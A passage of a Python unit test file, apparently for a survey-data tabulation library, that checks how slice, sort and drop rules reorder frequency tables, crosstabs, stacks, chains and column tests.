'iswtd': index_items(col_y, all=False, values=[2, 4, 6, 8, 10, 12, 14, 16])} stack = get_stack(self, meta, data, xks, yks, test_views, weights, extras=True) confirm_get_dataframe( self, stack, col_x, col_y, rules_values_x, rules_values_y) ################## sortx meta['columns'][col_x]['rules'] = { 'x': {'sortx': {'fixed': [5, 1, 3]}}} meta['columns'][col_y]['rules'] = { 'y': {'sortx': {'fixed': [6, 2, 4]}}} rules_values_x = { 'unwtd': index_items(col_x, all=False, values=[2, 15, 4, 16, 6, 10, 12, 14, 11, 7, 13, 8, 9, 5, 1, 3]), 'iswtd': index_items(col_x, all=False, values=[2, 15, 4, 16, 6, 12, 10, 14, 11, 7, 13, 9, 8, 5, 1, 3])} rules_values_y = { 'unwtd': index_items(col_y, all=False, values=[1, 16, 7, 15, 12, 3, 11, 14, 8, 10, 9, 5, 13, 6, 2, 4]), 'iswtd': index_items(col_y, all=False, values=[1, 16, 7, 12, 11, 3, 15, 8, 9, 10, 14, 5, 13, 6, 2, 4])} stack = get_stack(self, meta, data, xks, yks, test_views, weights, extras=True) confirm_get_dataframe( self, stack, col_x, col_y, rules_values_x, rules_values_y) ################## dropx meta['columns'][col_x]['rules'] = { 'x': {'dropx': {'values': [1, 3, 5, 7, 9, 11, 13, 15]}}} meta['columns'][col_y]['rules'] = { 'y': {'dropx': {'values': [2, 4, 6, 8, 10, 12, 14, 16]}}} rules_values_x = { 'unwtd': index_items(col_x, all=False, values=[2, 4, 6, 8, 10, 12, 14, 16]), 'iswtd': index_items(col_x, all=False, values=[2, 4, 6, 8, 10, 12, 14, 16])} rules_values_y = { 'unwtd': index_items(col_y, all=False, values=[1, 3, 5, 7, 9, 11, 13, 15]), 'iswtd': index_items(col_y, all=False, values=[1, 3, 5, 7, 9, 11, 13, 15])} stack = get_stack(self, meta, data, xks, yks, test_views, weights, extras=True) confirm_get_dataframe( self, stack, col_x, col_y, rules_values_x, rules_values_y) ################## slicex + sortx meta['columns'][col_x]['rules'] = { 'x': { 'slicex': {'values': frange('4-13')}, 'sortx': {'fixed': [4, 7, 3]}}} meta['columns'][col_y]['rules'] = { 'y': { 'slicex': {'values': frange('7-16')}, 'sortx': {'fixed': [7, 11, 13]}}} rules_values_x = { 'unwtd': index_items(col_x, all=False, values=[5, 6, 10, 12, 11, 13, 8, 9, 4, 7, 3]), 'iswtd': index_items(col_x, all=False, values=[5, 6, 12, 10, 11, 13, 9, 8, 4, 7, 3])} rules_values_y = { 'unwtd': index_items(col_y, all=False, values=[16, 15, 12, 14, 8, 10, 9, 7, 11, 13]), 'iswtd': index_items(col_y, all=False, values=[16, 12, 15, 8, 9, 10, 14, 7, 11, 13])} stack = get_stack(self, meta, data, xks, yks, test_views, weights, extras=True) confirm_get_dataframe( self, stack, col_x, col_y, rules_values_x, rules_values_y) ################## slicex + dropx meta['columns'][col_x]['rules'] = { 'x': { 'slicex': {'values': [1, 3, 5, 7, 9, 11, 13, 15]}, 'dropx': {'values': [3, 7, 11, 15]}}} meta['columns'][col_y]['rules'] = { 'y': { 'slicex': {'values': [2, 4, 6, 8, 10, 12, 14, 16]}, 'dropx': {'values': [2, 6, 10, 14]}}} rules_values_x = { 'unwtd': index_items(col_x, all=False, values=[1, 5, 9, 13]), 'iswtd': index_items(col_x, all=False, values=[1, 5, 9, 13])} rules_values_y = { 'unwtd': index_items(col_y, all=False, values=[4, 8, 12, 16]), 'iswtd': index_items(col_y, all=False, values=[4, 8, 12, 16])} stack = get_stack(self, meta, data, xks, yks, test_views, weights, extras=True) confirm_get_dataframe( self, stack, col_x, col_y, rules_values_x, rules_values_y) ################## sortx + dropx meta['columns'][col_x]['rules'] = { 'x': { 'sortx': {'fixed': [4, 7, 3]}, 'dropx': {'values': [5, 10]}}} meta['columns'][col_y]['rules'] = { 'y': { 'sortx': {'fixed': [7, 11, 13]}, 'dropx': {'values': [4, 12]}}} rules_values_x = { 'unwtd': index_items(col_x, all=False, values=[2, 1, 15, 16, 6, 12, 14, 11, 13, 8, 9, 4, 7, 3]), 'iswtd': index_items(col_x, all=False, values=[2, 1, 15, 16, 6, 12, 14, 11, 13, 9, 8, 4, 7, 3])} rules_values_y = { 'unwtd': index_items(col_y, all=False, values=[1, 2, 16, 15, 3, 14, 6, 8, 10, 9, 5, 7, 11, 13]), 'iswtd': index_items(col_y, all=False, values=[1, 2, 16, 3, 15, 8, 9, 10, 14, 5, 6, 7, 11, 13])} stack = get_stack(self, meta, data, xks, yks, test_views, weights, extras=True) confirm_get_dataframe( self, stack, col_x, col_y, rules_values_x, rules_values_y) def test_rules_get_chain(self): meta = self.example_data_A_meta data = self.example_data_A_data col_x = 'religion' col_y = 'ethnicity' others = ['q5_1'] xks = [col_x] yks = ['@', col_y] + others test_views = [ 'cbase', 'rbase', # 'ebase', 'counts', 'c%', 'r%', 'mean'] weights = [None, 'weight_a'] ################## slicex + sortx + dropx meta['columns'][col_x]['rules'] = { 'x': { 'slicex': {'values': frange('4-13')}, 'sortx': {'fixed': [4, 7, 3]}, 'dropx': {'values': [6, 11]}}} meta['columns'][col_y]['rules'] = { 'y': { 'slicex': {'values': frange('7-16')}, 'sortx': {'fixed': [7, 11, 13]}, 'dropx': {'values': [11, 16]}}} rules_values_x = { 'unwtd': index_items(col_x, all=False, values=[5, 10, 12, 13, 8, 9, 4, 7, 3]), 'iswtd': index_items(col_x, all=False, values=[5, 12, 10, 13, 9, 8, 4, 7, 3])} rules_values_y = { 'unwtd': index_items(col_y, all=False, values=[15, 12, 14, 8, 10, 9, 7, 13]), 'iswtd': index_items(col_y, all=False, values=[12, 15, 8, 9, 10, 14, 7, 13])} confirm_xy_chains( self, meta, data, col_x, col_y, others, test_views, weights, rules_values_x, rules_values_y) if EXTENDED_TESTS: ################## slicex meta['columns'][col_x]['rules'] = { 'x': {'slicex': {'values': [1, 3, 5, 7, 9, 10, 11, 13, 15]}}} meta['columns'][col_y]['rules'] = { 'y': {'slicex': {'values': [2, 4, 6, 8, 10, 12, 14, 16]}}} rules_values_x = { 'unwtd': index_items(col_x, all=False, values=[1, 3, 5, 7, 9, 10, 11, 13, 15]), 'iswtd': index_items(col_x, all=False, values=[1, 3, 5, 7, 9, 10, 11, 13, 15])} rules_values_y = { 'unwtd': index_items(col_y, all=False, values=[2, 4, 6, 8, 10, 12, 14, 16]), 'iswtd': index_items(col_y, all=False, values=[2, 4, 6, 8, 10, 12, 14, 16])} confirm_xy_chains( self, meta, data, col_x, col_y, others, test_views, weights, rules_values_x, rules_values_y) ################## sortx meta['columns'][col_x]['rules'] = { 'x': {'sortx': {'fixed': [5, 1, 3]}}} meta['columns'][col_y]['rules'] = { 'y': {'sortx': {'fixed': [6, 2, 4]}}} rules_values_x = { 'unwtd': index_items(col_x, all=False, values=[2, 15, 4, 16, 6, 10, 12, 14, 11, 7, 13, 8, 9, 5, 1, 3]), 'iswtd': index_items(col_x, all=False, values=[2, 15, 4, 16, 6, 12, 10, 14, 11, 7, 13, 9, 8, 5, 1, 3])} rules_values_y = { 'unwtd': index_items(col_y, all=False, values=[1, 16, 7, 15, 12, 3, 11, 14, 8, 10, 9, 5, 13, 6, 2, 4]), 'iswtd': index_items(col_y, all=False, values=[1, 16, 7, 12, 11, 3, 15, 8, 9, 10, 14, 5, 13, 6, 2, 4])} confirm_xy_chains( self, meta, data, col_x, col_y, others, test_views, weights, rules_values_x, rules_values_y) ################## dropx meta['columns'][col_x]['rules'] = { 'x': {'dropx': {'values': [1, 3, 5, 7, 9, 11, 13, 15]}}} meta['columns'][col_y]['rules'] = { 'y': {'dropx': {'values': [2, 4, 6, 8, 10, 12, 14, 16]}}} rules_values_x = { 'unwtd': index_items(col_x, all=False, values=[2, 4, 6, 8, 10, 12, 14, 16]), 'iswtd': index_items(col_x, all=False, values=[2, 4, 6, 8, 10, 12, 14, 16])} rules_values_y = { 'unwtd': index_items(col_y, all=False, values=[1, 3, 5, 7, 9, 11, 13, 15]), 'iswtd': index_items(col_y, all=False, values=[1, 3, 5, 7, 9, 11, 13, 15])} confirm_xy_chains( self, meta, data, col_x, col_y, others, test_views, weights, rules_values_x, rules_values_y) ################## slicex + sortx meta['columns'][col_x]['rules'] = { 'x': { 'slicex': {'values': frange('4-13')}, 'sortx': {'fixed': [4, 7, 3]}}} meta['columns'][col_y]['rules'] = { 'y': { 'slicex': {'values': frange('7-16')}, 'sortx': {'fixed': [7, 11, 13]}}} rules_values_x = { 'unwtd': index_items(col_x, all=False, values=[5, 6, 10, 12, 11, 13, 8, 9, 4, 7, 3]), 'iswtd': index_items(col_x, all=False, values=[5, 6, 12, 10, 11, 13, 9, 8, 4, 7, 3])} rules_values_y = { 'unwtd': index_items(col_y, all=False, values=[16, 15, 12, 14, 8, 10, 9, 7, 11, 13]), 'iswtd': index_items(col_y, all=False, values=[16, 12, 15, 8, 9, 10, 14, 7, 11, 13])} stack = get_stack(self, meta, data, xks, yks, test_views, weights, extras=True) confirm_xy_chains( self, meta, data, col_x, col_y, others, test_views, weights, rules_values_x, rules_values_y) ################## slicex + dropx meta['columns'][col_x]['rules'] = { 'x': { 'slicex': {'values': [1, 3, 5, 7, 9, 11, 13, 15]}, 'dropx': {'values': [3, 7, 11, 15]}}} meta['columns'][col_y]['rules'] = { 'y': { 'slicex': {'values': [2, 4, 6, 8, 10, 12, 14, 16]}, 'dropx': {'values': [2, 6, 10, 14]}}} rules_values_x = { 'unwtd': index_items(col_x, all=False, values=[1, 5, 9, 13]), 'iswtd': index_items(col_x, all=False, values=[1, 5, 9, 13])} rules_values_y = { 'unwtd': index_items(col_y, all=False, values=[4, 8, 12, 16]), 'iswtd': index_items(col_y, all=False, values=[4, 8, 12, 16])} confirm_xy_chains( self, meta, data, col_x, col_y, others, test_views, weights, rules_values_x, rules_values_y) ################## sortx + dropx meta['columns'][col_x]['rules'] = { 'x': { 'sortx': {'fixed': [4, 7, 3]}, 'dropx': {'values': [5, 10]}}} meta['columns'][col_y]['rules'] = { 'y': { 'sortx': {'fixed': [7, 11, 13]}, 'dropx': {'values': [4, 12]}}} rules_values_x = { 'unwtd': index_items(col_x, all=False, values=[2, 1, 15, 16, 6, 12, 14, 11, 13, 8, 9, 4, 7, 3]), 'iswtd': index_items(col_x, all=False, values=[2, 1, 15, 16, 6, 12, 14, 11, 13, 9, 8, 4, 7, 3])} rules_values_y = { 'unwtd': index_items(col_y, all=False, values=[1, 2, 16, 15, 3, 14, 6, 8, 10, 9, 5, 7, 11, 13]), 'iswtd': index_items(col_y, all=False, values=[1, 2, 16, 3, 15, 8, 9, 10, 14, 5, 6, 7, 11, 13])} confirm_xy_chains( self, meta, data, col_x, col_y, others, test_views, weights, rules_values_x, rules_values_y) def test_rules_coltests(self): meta = self.example_data_A_meta data = self.example_data_A_data col_x = 'q5_1' col_y = 'locality' xks = [col_x] yks = ['@', col_y] test_views = [ 'cbase', 'counts', 'mean'] weights = [None] dk = 'test' fk = 'no_filter' xk = col_x yk = col_y stack = get_stack( self, meta, data, xks, yks, test_views, weights, extras=True, coltests=True) ################## slicex ######### counts meta['columns'][col_y]['rules'] = { 'y': {'slicex': {'values': [5, 2, 3]}}} vk = 'x|t.props.askia.01|:|||askia tests' rules_values_df = pd.DataFrame([ [np.NaN, np.NaN, np.NaN], [np.NaN, np.NaN, np.NaN], [np.NaN, np.NaN, np.NaN], [np.NaN, np.NaN, np.NaN], [np.NaN, np.NaN, np.NaN], ['[2]', np.NaN, np.NaN], [np.NaN, np.NaN, np.NaN]]) keys = [dk, fk, xk, yk, vk] df = get_dataframe(stack, keys=keys, rules=True) actual = df.fillna(0).values.tolist() expected = rules_values_df.fillna(0).values.tolist() self.assertSequenceEqual(actual, expected) ######### net meta['columns'][col_y]['rules'] = { 'y': {'slicex': {'values': [3, 1, 5]}}} vk = 'x|t.props.askia.10|x[{1,2,3}]:|||askia tests' rules_values_df = pd.DataFrame([ [np.NaN, '[5]', np.NaN]]) keys = [dk, fk, xk, yk, vk] df = get_dataframe(stack, keys=keys, rules=True) actual = df.fillna(0).values.tolist() expected = rules_values_df.fillna(0).values.tolist() self.assertSequenceEqual(actual, expected) ######### block net meta['columns'][col_y]['rules'] = { 'y': {'slicex': {'values': [4, 1, 3]}}} vk = 'x|t.props.askia.10|x[{1,2}],x[{2,3}],x[{1,3}]:|||askia tests' rules_values_df = pd.DataFrame([ [np.NaN, np.NaN, np.NaN], [np.NaN, '[3, 4]', np.NaN], [np.NaN, '[4]', np.NaN]]) keys = [dk, fk, xk, yk, vk] df = get_dataframe(stack, keys=keys, rules=True) actual = df.fillna(0).values.tolist() expected = rules_values_df.fillna(0).values.tolist() self.assertSequenceEqual(actual, expected) ######### mean meta['columns'][col_y]['rules'] = { 'y': {'slicex': {'values': [5, 2, 4]}}} vk = 'x|t.means.askia.10|x:|||askia tests' rules_values_df = pd.DataFrame([ ['[2, 4]', np.NaN, '[2]']]) keys = [dk, fk, xk, yk, vk] df = get_dataframe(stack, keys=keys, rules=True) actual = df.fillna(0).values.tolist() expected = rules_values_df.fillna(0).values.tolist() self.assertSequenceEqual(actual, expected) ################## sortx ######### counts meta['columns'][col_y]['rules'] = { 'y': {'sortx': {'fixed': [1, 2]}}} vk = 'x|t.props.askia.01|:|||askia tests' rules_values_df = pd.DataFrame([ [np.NaN, np.NaN, np.NaN, np.NaN, np.NaN], [np.NaN, np.NaN, np.NaN, '[5]', np.NaN], [np.NaN, np.NaN, np.NaN, np.NaN, np.NaN], ['[1]', np.NaN, np.NaN, np.NaN, np.NaN], [np.NaN, np.NaN, np.NaN, np.NaN, np.NaN], [np.NaN, '[1, 2]', np.NaN, np.NaN, np.NaN], [np.NaN, '[1]', np.NaN, np.NaN, np.NaN]]) keys = [dk, fk, xk, yk, vk] df = get_dataframe(stack, keys=keys, rules=True) actual = df.fillna(0).values.tolist() expected = rules_values_df.fillna(0).values.tolist() self.assertSequenceEqual(actual, expected) ######### net meta['columns'][col_y]['rules'] = { 'y': {'sortx': {'fixed': [1, 2]}}} vk = 'x|t.props.askia.10|x[{1,2,3}]:|||askia tests' rules_values_df = pd.DataFrame([ [np.NaN, np.NaN, np.NaN, '[4, 5]', '[4]']]) keys = [dk, fk, xk, yk, vk] df = get_dataframe(stack, keys=keys, rules=True) actual = df.fillna(0).values.tolist() expected = rules_values_df.fillna(0).values.tolist() self.assertSequenceEqual(actual, expected) ######### block net meta['columns'][col_y]['rules'] = { 'y': {'sortx': {'fixed': [1, 2]}}} vk = 'x|t.props.askia.10|x[{1,2}],x[{2,3}],x[{1,3}]:|||askia tests' rules_values_df = pd.DataFrame([ ['[5]', np.NaN, np.NaN, '[2, 5]', np.NaN], [np.NaN, np.NaN, np.NaN, '[3, 4, 5]', '[4, 5]'], [np.NaN, np.NaN, np.NaN, '[4]', np.NaN]]) keys = [dk, fk, xk, yk, vk] df = get_dataframe(stack, keys=keys, rules=True) actual = df.fillna(0).values.tolist() expected = rules_values_df.fillna(0).values.tolist() self.assertSequenceEqual(actual, expected) ######### mean meta['columns'][col_y]['rules'] = { 'y': {'sortx': {'fixed': [1, 2]}}} vk = 'x|t.means.askia.10|x:|||askia tests' rules_values_df = pd.DataFrame([ ['[1]', '[1, 2, 3, 4]', '[1, 2, 3]', np.NaN, '[1]']]) keys = [dk, fk, xk, yk, vk] df = get_dataframe(stack, keys=keys, rules=True) actual = df.fillna(0).values.tolist() expected = rules_values_df.fillna(0).values.tolist() self.assertSequenceEqual(actual, expected) ################## dropx ######### counts meta['columns'][col_y]['rules'] = { 'y': {'dropx': {'values': [1, 4]}}} vk = 'x|t.props.askia.01|:|||askia tests' rules_values_df = pd.DataFrame([ [np.NaN, np.NaN, np.NaN], [np.NaN, np.NaN, np.NaN], [np.NaN, np.NaN, np.NaN], [np.NaN, np.NaN, np.NaN], [np.NaN, np.NaN, np.NaN], [np.NaN, np.NaN, '[2]'], [np.NaN, np.NaN, np.NaN]]) keys = [dk, fk, xk, yk, vk] df = get_dataframe(stack, keys=keys, rules=True) actual = df.fillna(0).values.tolist() expected = rules_values_df.fillna(0).values.tolist() self.assertSequenceEqual(actual, expected) ######### net meta['columns'][col_y]['rules'] = { 'y': {'dropx': {'values': [1, 3]}}} vk = 'x|t.props.askia.10|x[{1,2,3}]:|||askia tests' rules_values_df = pd.DataFrame([ ['[4]', np.NaN, np.NaN]]) keys = [dk, fk, xk, yk, vk] df = get_dataframe(stack, keys=keys, rules=True) actual = df.fillna(0).values.tolist() expected = rules_values_df.fillna(0).values.tolist() self.assertSequenceEqual(actual, expected) ######### block net meta['columns'][col_y]['rules'] = { 'y': {'dropx': {'values': [2, 4]}}} vk = 'x|t.props.askia.10|x[{1,2}],x[{2,3}],x[{1,3}]:|||askia tests' rules_values_df = pd.DataFrame([ ['[5]', '[5]', np.NaN], ['[3, 5]', np.NaN, np.NaN], [np.NaN, np.NaN, np.NaN]]) keys = [dk, fk, xk, yk, vk] df = get_dataframe(stack, keys=keys, rules=True) actual = df.fillna(0).values.tolist() expected = rules_values_df.fillna(0).values.tolist() self.assertSequenceEqual(actual, expected) ######### mean meta['columns'][col_y]['rules'] = { 'y': {'dropx': {'values': [1, 3]}}} vk = 'x|t.means.askia.10|x:|||askia tests' rules_values_df = pd.DataFrame([ [np.NaN, '[2]', '[2, 4]']]) keys = [dk, fk, xk, yk, vk] df = get_dataframe(stack, keys=keys, rules=True) actual = df.fillna(0).values.tolist() expected = rules_values_df.fillna(0).values.tolist() self.assertSequenceEqual(actual, expected) def test_rules_coltests_flag_bases(self): meta = self.example_data_A_meta data = self.example_data_A_data col_x = 'q5_1' col_y = 'locality' xks = [col_x] yks = ['@', col_y] test_views = [ 'cbase', 'counts', 'mean'] weights = [None] dk = 'test' fk = 'no_filter' xk = col_x yk = col_y minimum = 1000 small = 2000 stack = get_stack( self, meta, data, xks, yks, test_views, weights, extras=True, coltests=True, flag_bases=[minimum, small]) ################## slicex ######### counts meta['columns'][col_y]['rules'] = { 'y': {'slicex': {'values': [5, 2, 3]}}} vk = 'x|t.props.Dim.05|:|||askia tests' rules_values_df = pd.DataFrame([ ['**', np.NaN, '[2]*'], ['**', np.NaN, '*'], ['**', np.NaN, '*'], ['**', np.NaN, '*'], ['**', np.NaN, '*'], ['**', np.NaN, '*'], ['**', np.NaN, '*']]) keys = [dk, fk, xk, yk, vk] df = get_dataframe(stack, keys=keys, rules=True) cbase = 'x|f|x:|||cbase' keys_cbase = [dk, fk, xk, yk, cbase] df_cbase = get_dataframe(stack, keys=keys_cbase, rules=True) is_minimum = [c<=minimum for c in df_cbase.values[0]] is_small = [c>minimum and c<=small for c in df_cbase.values[0]] actual = is_minimum expected = [True, False, False] self.assertSequenceEqual(actual, expected) actual = is_small expected = [False, False, True] self.assertSequenceEqual(actual, expected) actual = df.fillna(0).values.tolist() expected = rules_values_df.fillna(0).values.tolist() self.assertSequenceEqual(actual, expected) ################## sortx ######### counts meta['columns'][col_y]['rules'] = { 'y': {'sortx': {'fixed': [1, 2]}}} vk = 'x|t.props.Dim.05|:|||askia tests' rules_values_df = pd.DataFrame([ ['[1, 2]*', '**', '**', np.NaN, np.NaN], ['*', '**', '**', '[2, 3]', np.NaN], ['*', '**', '**', np.NaN, np.NaN], ['[1]*', '**', '**', np.NaN, '[1]'], ['*', '**', '**', np.NaN, np.NaN], ['*', '**', '**', np.NaN, np.NaN], ['*', '**', '**', np.NaN, np.NaN]]) keys = [dk, fk, xk, yk, vk] df = get_dataframe(stack, keys=keys, rules=True) cbase = 'x|f|x:|||cbase' keys_cbase = [dk, fk, xk, yk, cbase] df_cbase = get_dataframe(stack, keys=keys_cbase, rules=True) is_minimum = [c<=minimum for c in df_cbase.values[0]] is_small = [c>minimum and c<=small for c in df_cbase.values[0]] actual = is_minimum expected = [False, True, True, False, False] self.assertSequenceEqual(actual, expected) actual = is_small expected = [True, False, False, False, False] self.assertSequenceEqual(actual, expected) actual = df.fillna(0).values.tolist() expected = rules_values_df.fillna(0).values.tolist() self.assertSequenceEqual(actual, expected) ################## dropx ######### counts meta['columns'][col_y]['rules'] = { 'y': {'dropx': {'values': [1, 4]}}} vk = 'x|t.props.Dim.05|:|||askia tests' rules_values_df = pd.DataFrame([ [np.NaN, '[2]*', '**'], [np.NaN, '*', '**'], [np.NaN, '*', '**'], [np.NaN, '*', '**'], [np.NaN, '*', '**'], [np.NaN, '*', '**'], [np.NaN, '*', '**']]) keys = [dk, fk, xk, yk, vk] df = get_dataframe(stack, keys=keys, rules=True) cbase = 'x|f|x:|||cbase' keys_cbase = [dk, fk, xk, yk, cbase] df_cbase = get_dataframe(stack, keys=keys_cbase, rules=True) is_minimum = [c<=minimum for c in df_cbase.values[0]] is_small = [c>minimum and c<=small for c in df_cbase.values[0]] actual = is_minimum expected = [False, False, True] self.assertSequenceEqual(actual, expected) actual = is_small expected = [False, True, False] self.assertSequenceEqual(actual, expected) actual = df.fillna(0).values.tolist() expected = rules_values_df.fillna(0).values.tolist() self.assertSequenceEqual(actual, expected) # ##################### Helper functions ##################### def index_items(col, values, all=False): """ Return a correctly formed list of tuples to matching an index. """ items = [ (col, i) for i in values ] if all: items = [(col, 'All')] + items return items def confirm_frequencies(self, meta, data, weights, col, rules_values_x, rules_values_y): """ Confirms all variations of rules applied with frequency. """ df = frequency(meta, data, x=col) natural_x = df.index.values.tolist() natural_y = natural_x frequ_x = [(col, '@')] frequ_y = frequ_x for weight in weights: if weight is None: rules_x = rules_values_x['unwtd'] rules_y = rules_values_y['unwtd'] else: rules_x = rules_values_x['iswtd'] rules_y = rules_values_y['iswtd'] # rules=True fx = frequency(meta, data, x=col, weight=weight, rules=True) fy = frequency(meta, data, y=col, weight=weight, rules=True) # print fx # print zip(*rules_x)[1] # print zip(*rules_y)[1] confirm_index_columns(self, fx, rules_x, frequ_x) confirm_index_columns(self, fy, frequ_x, rules_y) # rules=False fx = frequency(meta, data, x=col, weight=weight, rules=False) fy = frequency(meta, data, y=col, weight=weight, rules=False)<|fim▁hole|> confirm_index_columns(self, fx, natural_x, frequ_x) confirm_index_columns(self, fy, frequ_x, natural_y) # rules=x fx = frequency(meta, data, x=col, weight=weight, rules=['x']) fy = frequency(meta, data, y=col, weight=weight, rules=['x']) confirm_index_columns(self, fx, rules_x, frequ_x) confirm_index_columns(self, fy, frequ_x, natural_y) # rules=y fx = frequency(meta, data, x=col, weight=weight, rules=['y']) fy = frequency(meta, data, y=col, weight=weight, rules=['y']) confirm_index_columns(self, fx, natural_x, frequ_x) confirm_index_columns(self, fy, frequ_x, rules_y) # rules=xy fx = frequency(meta, data, x=col, weight=weight, rules=['x', 'y']) fy = frequency(meta, data, y=col, weight=weight, rules=['x', 'y']) confirm_index_columns(self, fx, rules_x, frequ_x) confirm_index_columns(self, fy, frequ_x, rules_y) def confirm_crosstabs(self, meta, data, weights, col_x, col_y, rules_values_x, rules_values_y): """ Confirms all variations of rules applied with frequency. """ fx = frequency(meta, data, x=col_x) natural_x = fx.index.values.tolist() fy = frequency(meta, data, y=col_y) natural_y = fy.columns.values.tolist() for weight in weights: if weight is None: rules_x = rules_values_x['unwtd'] rules_y = rules_values_y['unwtd'] else: rules_x = rules_values_x['iswtd'] rules_y = rules_values_y['iswtd'] for xtotal in [False, True]: # rules=True df = crosstab(meta, data, col_x, col_y, weight=weight, rules=True, xtotal=xtotal) confirm_index_columns(self, df, rules_x, rules_y) # print df # print df.index # print df.columns # print zip(*rules_x)[1] # print zip(*rules_y)[1] # rules=False df = crosstab(meta, data, col_x, col_y, weight=weight, rules=False, xtotal=xtotal) confirm_index_columns(self, df, natural_x, natural_y) # rules=x df = crosstab(meta, data, col_x, col_y, weight=weight, rules=['x'], xtotal=xtotal) confirm_index_columns(self, df, rules_x, natural_y) # rules=y df = crosstab(meta, data, col_x, col_y, weight=weight, rules=['y'], xtotal=xtotal) confirm_index_columns(self, df, natural_x, rules_y) # rules=xy df = crosstab(meta, data, col_x, col_y, weight=weight, rules=['x', 'y'], xtotal=xtotal) confirm_index_columns(self, df, rules_x, rules_y) def confirm_get_dataframe(self, stack, col_x, col_y, rules_values_x, rules_values_y): """ Confirms all variations of rules applied with frequency. """ keys = ['dk', 'fk', 'xk', 'yk', 'vk'] keys[0] = dk = 'test' keys[1] = fk = 'no_filter' keys[2] = xk = col_x keys[3] = yk = col_y meta = stack[dk].meta data = stack[dk].data vks = stack.describe()['view'].values.tolist() for xk in [col_x]: keys[2] = xk for yk in ['@', col_y]: if xk=='@' and yk=='@': continue keys[3] = yk for vk in vks: keys[4] = vk # if 'mean' in vk: # print vk rules_x, natural_x, rules_y, natural_y = get_xy_values( meta, data, col_x, col_y, xk, yk, vk, rules_values_x, rules_values_y ) # rules=True df = get_dataframe(stack, keys=keys, rules=True) # print df # print df.index # print df.columns # print zip(*rules_x)[1] # print zip(*rules_y)[1] confirm_index_columns(self, df, rules_x, rules_y) # rules=False df = get_dataframe(stack, keys=keys, rules=False) confirm_index_columns(self, df, natural_x, natural_y) # rules=x df = get_dataframe(stack, keys=keys, rules=['x']) confirm_index_columns(self, df, rules_x, natural_y) # rules=y df = get_dataframe(stack, keys=keys, rules=['y']) confirm_index_columns(self, df, natural_x, rules_y) # rules=xy df = get_dataframe(stack, keys=keys, rules=['x', 'y']) confirm_index_columns(self, df, rules_x, rules_y) def confirm_xy_chains(self, meta, data, col_x, col_y, others, views, weights, rules_values_x, rules_values_y): stack = get_stack( self, meta, data, [col_x], ['@', col_y] + others, views, weights, extras=True) confirm_get_xchain( self, stack, col_x, col_y, others, rules_values_x, rules_values_y) stack = get_stack( self, meta, data, [col_x] + others, [col_y], views, weights, extras=True) confirm_get_ychain( self, stack, col_x, col_y, others, rules_values_x, rules_values_y) def confirm_get_xchain(self, stack, col_x, col_y, others, rules_values_x, rules_values_y): """ Confirms all variations of rules applied with frequency. """ keys = ['dk', 'fk', 'xk', 'yk', 'vk'] keys[0] = dk = 'test' keys[1] = fk = 'no_filter' keys[2] = xk = col_x keys[3] = yk = col_y meta = stack[dk].meta data = stack[dk].data xks = [col_x] yks = ['@', col_y] + others confirm_get_chain( self, meta, data, stack, keys, col_x, col_y, xks, yks, rules_values_x, rules_values_y, others) def confirm_get_ychain(self, stack, col_x, col_y, others, rules_values_x, rules_values_y): """ Confirms all variations of rules applied with frequency. """ keys = ['dk', 'fk', 'xk', 'yk', 'vk'] keys[0] = dk = 'test' keys[1] = fk = 'no_filter' keys[2] = xk = col_x keys[3] = yk = col_y meta = stack[dk].meta data = stack[dk].data xks = [col_x] + others yks = [col_y] confirm_get_chain( self, meta, data, stack, keys, col_x, col_y, xks, yks, rules_values_x, rules_values_y, others) def confirm_get_chain(self, meta, data, stack, keys, col_x, col_y, xks, yks, rules_values_x, rules_values_y, others=[]): vks = stack.describe()['view'].values.tolist() weight = None chain_true_unwtd = stack.get_chain(x=xks, y=yks, views=vks, rules=True, rules_weight=weight) chain_false_unwtd = stack.get_chain(x=xks, y=yks, views=vks, rules=False, rules_weight=weight) chain_x_unwtd = stack.get_chain(x=xks, y=yks, views=vks, rules=['x'], rules_weight=weight) chain_y_unwtd = stack.get_chain(x=xks, y=yks, views=vks, rules=['y'], rules_weight=weight) chain_xy_unwtd = stack.get_chain(x=xks, y=yks, views=vks, rules=['x', 'y'], rules_weight=weight) weight = 'weight_a' chain_true_wtd = stack.get_chain(x=xks, y=yks, views=vks, rules=True, rules_weight=weight) chain_false_wtd = stack.get_chain(x=xks, y=yks, views=vks, rules=False, rules_weight=weight) chain_x_wtd = stack.get_chain(x=xks, y=yks, views=vks, rules=['x'], rules_weight=weight) chain_y_wtd = stack.get_chain(x=xks, y=yks, views=vks, rules=['y'], rules_weight=weight) chain_xy_wtd = stack.get_chain(x=xks, y=yks, views=vks, rules=['x', 'y'], rules_weight=weight) for xk in xks: keys[2] = xk for yk in yks: if xk=='@' and yk=='@': continue keys[3] = yk for vk in vks: keys[4] = vk for weight in [None, 'weight_a']: # if xk=='q5_1' and yk=='ethnicity' and vk=='x|f|x:|||ebase': # print xk, yk, vk # if vk=='x|f|:y|||rbase' and yk=='q5_1': # print vk rules_x, natural_x, rules_y, natural_y = get_xy_values( meta, data, col_x, col_y, xk, yk, vk, rules_values_x, rules_values_y, others, rules_weight=weight ) # rules=True if weight is None: df = get_dataframe(chain_true_unwtd, keys=keys, rules=False) # print df # print df.index # print df.columns # print zip(*rules_x)[1] # print zip(*rules_y)[1] confirm_index_columns(self, df, rules_x, rules_y) # rules=False df = get_dataframe(chain_false_unwtd, keys=keys, rules=False) confirm_index_columns(self, df, natural_x, natural_y) # rules=x df = get_dataframe(chain_x_unwtd, keys=keys, rules=False) confirm_index_columns(self, df, rules_x, natural_y) # rules=y df = get_dataframe(chain_y_unwtd, keys=keys, rules=False) confirm_index_columns(self, df, natural_x, rules_y) # rules=xy df = get_dataframe(chain_xy_unwtd, keys=keys, rules=False) confirm_index_columns(self, df, rules_x, rules_y) else: df = get_dataframe(chain_true_wtd, keys=keys, rules=False) # print df # print df.index # print df.columns # print zip(*rules_x)[1] # print zip(*rules_y)[1] confirm_index_columns(self, df, rules_x, rules_y) # rules=False df = get_dataframe(chain_false_wtd, keys=keys, rules=False) confirm_index_columns(self, df, natural_x, natural_y) # rules=x df = get_dataframe(chain_x_wtd, keys=keys, rules=False) confirm_index_columns(self, df, rules_x, natural_y) # rules=y df = get_dataframe(chain_y_wtd, keys=keys, rules=False) confirm_index_columns(self, df, natural_x, rules_y) # rules=xy df = get_dataframe(chain_xy_wtd, keys=keys, rules=False) confirm_index_columns(self, df, rules_x, rules_y) def get_xy_values(meta, data, col_x, col_y, xk, yk, vk, rules_values_x, rules_values_y, others=[], rules_weight='auto'): v_method = vk.split('|')[1] relation = vk.split('|')[2] relative = vk.split('|')[3] weight = vk.split('|')[4] shortnam = 